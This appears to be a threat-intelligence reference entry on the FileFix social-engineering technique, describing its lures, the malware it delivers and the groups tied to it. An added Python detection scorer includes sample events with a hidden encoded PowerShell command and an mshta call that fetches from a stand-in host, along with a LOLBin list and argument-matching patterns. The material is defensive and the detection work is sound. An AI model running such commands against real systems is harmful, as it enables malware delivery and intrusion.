FileFix
FileFix is a social-engineering malware delivery technique and a named variant of ClickFix that abuses trusted Windows interfaces to trick users into manually executing attacker-supplied commands. First revealed by security researcher mr.d0x in June 2025, FileFix shifts execution from the Windows Run dialog to the Windows File Explorer address bar, making the activity stealthier and helping it avoid some standard security alerts. Like ClickFix, it commonly relies on fake verification, error, or CAPTCHA-style prompts and can use JavaScript clipboard APIs to place malicious commands for the victim to paste and run.
The technique has been used to deliver multiple malware families, including Interlock RAT and StealC v2 infostealer; broader ClickFix/FileFix activity has also been associated with delivery of infostealers, loaders, RATs, and rootkits. Reported delivery vectors for the broader technique include spearphishing, malvertising, SEO poisoning, compromised websites, and social media content. One FileFix campaign attributed to the KongTuke threat cluster distributed Interlock RAT via compromised websites and fake CAPTCHA prompts. Another FileFix campaign impersonated Facebook security alerts and used AI-generated images with embedded PowerShell scripts to deliver StealC v2. A later in-the-wild FileFix campaign was reported to use steganography.
FileFix is associated with the broader commercialization and operational adoption of ClickFix-style tradecraft by both cybercriminal and state-aligned actors. The surrounding reporting states that ClickFix/FileFix activity has targeted sectors including technology, financial services, manufacturing, retail, government, and energy, and that related ClickFix operations have been linked to groups such as APT28 and MuddyWater. High-confidence behavioral characteristics from the related technique include user-initiated execution of obfuscated commands via trusted Windows tools, frequent use of PowerShell and other LOLBins, and follow-on malware execution after the pasted command runs.
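A detection-side illustration added here (not from the page or from Mallory): a small Python scorer that runs over constructed Sysmon-style process-creation events and flags the pattern described above, explorer.exe (which hosts both the Run dialog and the File Explorer address bar) launching a LOLBin with obfuscated or download-and-execute arguments. The event field names, the LOLBin list and the argument patterns are assumptions, not indicators taken from the reporting.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (ParentImage, Image,
# CommandLine). Illustrative only; the encoded blob is a placeholder, not a payload.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc QUJDREVGRw=="},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Interpreters and download/execute utilities commonly pasted via ClickFix/FileFix lures (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe"}

# Arguments typical of obfuscated or download-and-execute one-liners (assumed patterns).
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|\biex\b|"
    r"invoke-expression|downloadstring|invoke-webrequest|\bhttps?://)")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Reasons the event looks like user-pasted FileFix/ClickFix execution; [] if not flagged.
    Both the Run dialog and the File Explorer address bar are hosted by explorer.exe,
    so that parent is the common pivot point for both variants."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent != "explorer.exe" or child not in LOLBINS:
        return []
    match = SUSPICIOUS_ARGS.search(event["CommandLine"])
    if not match:
        return []  # explorer.exe -> cmd.exe on its own is too noisy to alert on
    return [f"explorer.exe spawned {child}", f"suspicious argument: {match.group(0)}"]


def find_suspicious(events):
    """Return (command line, reasons) for every flagged event."""
    return [(ev["CommandLine"], classify(ev)) for ev in events if classify(ev)]
```

In a SIEM the same logic is usually expressed as a Sigma rule keyed on ParentImage and CommandLine; the Python form is only here to make the matching decisions explicit.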
Recent activity
3 sources tracked across advisories, community write-ups, and news.
A named relative of ClickFix that uses other trusted Windows tools as part of the same broader social-engineering execution pattern.
FileFix is an evolution of ClickFix that prompts users to paste malicious commands into the Windows File Explorer address bar, resulting in the execution of attacker-controlled code. It is stealthier than ClickFix, harder to detect, and is used to deliver malware such as RATs and infostealers.
FileFix is a malware campaign leveraging steganography to conceal malicious payloads, moving beyond proof-of-concept to active exploitation.